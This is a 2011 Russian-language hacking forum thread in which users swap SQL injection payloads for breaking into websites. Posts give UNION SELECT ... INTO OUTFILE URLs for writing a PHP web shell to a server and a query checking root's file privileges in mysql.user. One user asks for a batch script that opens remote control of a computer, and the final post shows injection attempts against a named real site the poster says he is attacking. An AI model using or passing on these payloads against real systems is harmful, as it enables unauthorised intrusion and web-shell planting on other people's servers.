20.11.2011, 15:36
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от aydin-ka
1) Попробуй подменить POST-запрос, через Tamper Data
2) SQL-injection есть??
sql-inj есть, щас попробую
|
|
|
20.11.2011, 15:42
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Сообщение от er9j6@
sql-inj есть, щас попробую
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны путь/1.php'--
P.S: у пользователя должны быть права на запись
2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--
Если появиться Y то действуй дальше
|
|
|
|
20.11.2011, 15:44
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от aydin-ka
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны путь/1.php'--
P.S: у пользователя должны быть права на запись
2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--
Если появиться
Y
то действуй дальше
Доступа к mysql нет.
|
|
|
|
20.11.2011, 16:09
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
подскажите код батника, чтобы он открывал удаленное управление компьютером
|
|
|
|
20.11.2011, 21:47
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от Cherep
подскажите код батника, чтобы он открывал удаленное управление компьютером
Есть только батник кряк интернета, надо?
|
|
|
|
20.11.2011, 22:28
|
|
Познающий
Регистрация: 08.08.2009
Сообщений: 37
С нами:
8819816
Репутация:
2
|
|
Может ТС имел что то типо этого ?
hххp:/thread276456-telnet.html
|
|
|
|
21.11.2011, 01:38
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
С нами:
8940726
Репутация:
2
|
|
Сообщение от AppS
Может ТС имел что то типо этого ?
hххp:/thread276456-telnet.html
ТС имел ввиду вот это
Сообщение от darky
В этой и только в этой теме вы можете задать вопрос проспособ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках(для остального есть поиск по форуму).
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать. Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях
крайне не рекомендуется
|
|
|
|
21.11.2011, 04:45
|
|
Познающий
Регистрация: 08.08.2009
Сообщений: 37
С нами:
8819816
Репутация:
2
|
|
Это надо у него спросить
В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html
есть такой абзац
Сообщение от None
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все но что то сегодня мы с ним не дружим)
Заранее спасибо! |
|
|
|
21.11.2011, 04:57
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от AppS
Это надо у него спросить
В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html
есть такой абзац
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все
но что то сегодня мы с ним не дружим)
Заранее спасибо!
https://rdot.org/forum/showthread.php?t=352
|
|
|
|
21.11.2011, 12:08
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Ломал Железного Майка , но столкнулся с этим:
Код:
http://ironmiketyson.ru/article_read.php?id=1+union+select+1+--+
хотя,
Код:
http://ironmiketyson.ru/article_read.php?id=1+order+by+1+--+
обрабатывается нормально. Раньше не сталкивался... |
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
